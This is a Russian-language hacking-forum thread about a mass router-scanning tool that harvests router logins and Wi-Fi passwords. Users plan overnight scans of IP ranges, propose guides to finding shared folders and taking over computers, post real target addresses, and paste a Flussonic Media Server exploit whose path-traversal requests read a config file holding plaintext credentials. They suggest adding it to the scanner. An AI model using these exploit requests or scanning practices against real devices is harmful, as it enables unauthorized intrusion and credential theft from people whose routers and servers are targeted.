Выкладываю инструкцию с последними изменениями автора + Оригинальные скрины Spoiler: Manual v1.0 Full http://rghost.ru/8HCzDVRZ5 password: antichat Автору RS перед релизом Сделай контроль соединения !!! Spoiler: а то беда поставил сканить с чужого роутера на ночь, естественно он там отвалился или еще что то. Сеть пропала, а программа продолжает сканировать даже если нет сети (поключения к инету) Добавь согласно настроек автосохранения (по времени) еще и пинг googl.ru: - пинг есть продолжает работать - пинга нет сохраняет и останавливает скан (ведется лог на каком адресе пропал пинг [для того чтобы потом самостоятельно перескнировать] ) - пингует каждые 5 минут как появился -продолжает скан
оно, но не хватает логирования, чтобы не пропустить момент. Ступил ведь google.com можно записать как 64.233.186.138, а порт какой писать? За что отвечают параметры: Frequency - ? Timeout - это через сколько производить пинг?
Frequency - как часто проверять, ну а таймаут - он и есть таймаут, т.е. сколько будет ждать ответа.... порт 80 писать... но думаю если не указать порт - то он будет по дефолту стучаться на 80-й порт!!!
Если используется режим ICMP (Ping), то порт можно любой прописать. Он используется только в режиме проверки TCP Connect. Я обычно использую второй режим, вместе с адресом 8.23.224.120:80 (хост dynupdate.no-ip.com). Частота проверки, каждые X секунд выполняет проверку. Это есть время, отведённое на проверку. Если в течение X миллисекунд пинг не ответит, или соединение не установится, то проверка считается проваленной. После трёх неудачных проверок сканирование ставится на паузу. После первой же удачной проверки сканирование возобновляется. Что-нибудь придумаю...
а пропущенные айпи между последней удачной проверкой и паузой ресканятся? или так и остаются пропущенными?
Для этого я и просил Не знаю как сказать, но ты очень большой молодец. Красавчик. Пожелать могу творческих успехов !!! П.С. Когда ждать релиз? Spoiler: Использование полученных данных Нужны консультанты для написания дальнейшей инструкции: 1) скан компа на шару в сети 2) получение доступа к компу
Если есть желающие, то буду держать инструкцию в актуальном состоянии. Добавил в иструкцию (выложу позже) Spoiler: Хочу немного подправить инструкцию Автор объясни Строка User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1 Это 3 разных (Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1) ? если да, то они меняются во время сканирования ? как правильно писать? через TAB или как? (Да я знаю что есть и такой юзер агент - Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_7; da-dk) AppleWebKit/533.21.1 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1 НО вдруг ты реализовал рендромную-смену так сказать недокументированная фича программы ) В основном ведь используется такой формат записи - Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Желающие могут сменить на Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en-US) - Кому что непонятно задавайте вопросы. Буду дополнять.
Очень много вот таких видит но не вытаскивает данные. Tp-link tl-wr841n и nd http://78.29.8.116.8080/ Собственно сама его прошивка. http://rghost.ru/8DMHTNspX
Не, это одна полная строка. Можно было перехватить чем-нибудь запросы, да посмотреть... я бы так и сделал Нет данных для входа в роутер.
добрый день уважаемый binarymaster. ну на счет эксплойтов на эти модели - то они есть, только правда не совсем стыкуются с политикой программы кстати, натолкнулся недавно на такую интересную вещь - система flussonik. рутерскан ее определяет и даже пытается пробить эксплойтами. тут нашел эксплойтик. посмотрите, может подойдет для реализации в прогрмамме. как я понял в последующих релизах есть предложения влючить и айпи камеры кстати на мой взгляд очень хорошая идея. совместными усиьлиями превратить рутескан в супер комбайн Spoiler: эксплойт Полное название Flussonic Media Server 4.1.25 - 4.3.3 - Aribtrary File Disclosure Vulnerability Дата добавления 02-07-2014 Категория dos / poc Платформа aix Риск Security Risk High Document Title: ============ Flussonic Media Server 4.3.3 Multiple Vulnerabilities Release Date: =========== June 29, 2014 Product & Service Introduction: ======================== Flussonic is a mutli-protocol streaming server with support for many protocols, including HDS, HLS, RTMP, RTSP, HTTP, MPEG-TS. Flussonic has the capability of capturing multimedia from external sources, such as video cameras, satellite TV and other multimedia servers (Wowza, Flash Media Server and Red5). Flussonic operates on the highly flexible and fast Erlang platform that facilitates impressive performance during parallel data processing, failure safety for servers, and scaling options up to a sophisticated distributed data network. Abstract Advisory Information: ======================= BGA Security Team discovered an arbitrary file read and arbitrary directory listing vulnerability in Flussonic Media Server 4.3.3 Vulnerability Disclosure Timeline: ========================= June 26, 2014 : Contact with Vendor June 26, 2014 : Vendor Response June 26, 2014 : Version 4.3.4 Deployed June 29, 2014 : Public Disclosure Discovery Status: ============= Published Affected Product(s): =============== Erlyvideo, LLC Product: Flussonic Media Server 4.1.25 - 4.3.3 Exploitation Technique: ================== AFR: Remote, Unauthenticated ADL: Remote, Authenticated Severity Level: =========== High Technical Details & Description: ======================== 1. Arbitrary File Read (Unauthenticated) It’s possible to read any files from the server (with the application’s user’s permissions) by a simple HTTP GET request. Flussonic’s web interface login information can be found as plaintext by reading /etc/flussonic/flussonic.conf; thus, it’s possible to login any Flussonic web interface using that method. 2. Arbitrary Directory Listing (Authenticated) It’s possible to list any directories’ content sending a HTTP GET request to “flussonic/api/list_files” with the parameter “subpath=directory”. Proof of Concept (PoC): ================== Proof of Concept AFR Request & Response: GET /../../../etc/flussonic/flussonic.conf HTTP/1.1 Host: 6.6.6.100:8080 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive HTTP/1.1 200 OK Connection: keep-alive Server: Cowboy Date: Thu, 26 Jun 2014 09:50:57 GMT Content-Length: 191 Content-Type: text/plain Last-Modified: Tue, 24 Jun 2014 22:10:53 GMT Etag: 1452b98181c562b2e2d041a3e1fe2af0cffe8687 # Default ports Flussonic M1 Media server listens on http 80; http 8080; rtmp 1935; rtsp 554; pulsedb /var/run/flussonic; edit_auth flussonic letmein!; live mylive; file vod { path priv; } 2. Proof of Concept ADR Request & Response: GET /flussonic/api/list_files?subpath=../../../etc HTTP/1.1 Host: 6.6.6.100:8080 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Authorization: Basic Zmx1c3NvbmljOmxldG1laW4h Connection: keep-alive HTTP/1.1 200 OK Connection: keep-alive Server: Cowboy Date: Thu, 26 Jun 2014 11:04:12 GMT Content-Length: 7555 X-Route-Time: 28 X-Run-Time: 8090 Content-Type: application/json {“files":[{"name":"X11","type":"directory"},{"name":"acpi","type":"directory"},{"name":"adduser.conf","type":"file","prefix":"vod"},{"name":"alternatives","type":"directory"},{"name":"apache2","type":"directory"},{"name":"apm","type":"directory"}, ……… {“name":"xml","type":"directory"},{"name":"zsh_command_not_found","type":"file","prefix":"vod"}]} Solution Fix & Patch: ================ Update version 4.3.4 Security Risk: ========== The risk of the vulnerabilities above estimated as high and medium. # 0day.today [2015-09-29] # fb.com/inj3ct0rs and twitter.com/inj3ct0r страница сплойта http://ru.0day.today/exploit/22398 за подчеркнутый текст прошу прощения, глюк какой-то
кстати, интересный момент - TP-LINK TL-WR740N в одних случаях отдает только мак и ессид, а в других случаях пароль на вайфай. но паролей на сам роутер не выдает. с чем это может быть связано? прошивки разные?
Spoiler: фича ника бинари мастера сам наткнулся на косяк такой что после ника пробел расценивается как продолжение ника Исправляем: нажимаешь редактировать сообщение. Далее нажимаешь в правом углу гаечный ключ. ищешь в конце сообщения это "комбайн [/URL][/B][/SIZE]" и переносишь [/URL][/B][/SIZE] в конец ника сюда Code: [SIZE=4][B][URL='http://forum.antichat.ru/members/148032/'] binarymaster должно получится так Code: [SIZE=4][B][URL='http://forum.antichat.ru/members/148032/']binarymaster[/URL][/B][/SIZE] Для исправление указывайте в спойлере адрес найденных роутеров с проблемами (+ если есть логин и пас), автор не телепат!
у меня бета вообще на них не реагаирут, статус Router Webserver (Login Incorrect), пароль админ и логин админ (в пасс листах точно есть) и при скане (не помню уже диапозон, но все штук 20-ть их вообще не отпарсил...), binarymaster, глянь пожалуйста данную модель, мож че поломалось в бетке с этим роутером, если надо айпишник их, то завтра на работе найду их и кину...
у меня на работе эта модель роутера оказывается, щас провер, логин и пароль не подбирает (в пасслистах он есть) gis.sytes.net -это дин днс его, порт 8885, логин и пароль в личку отправлю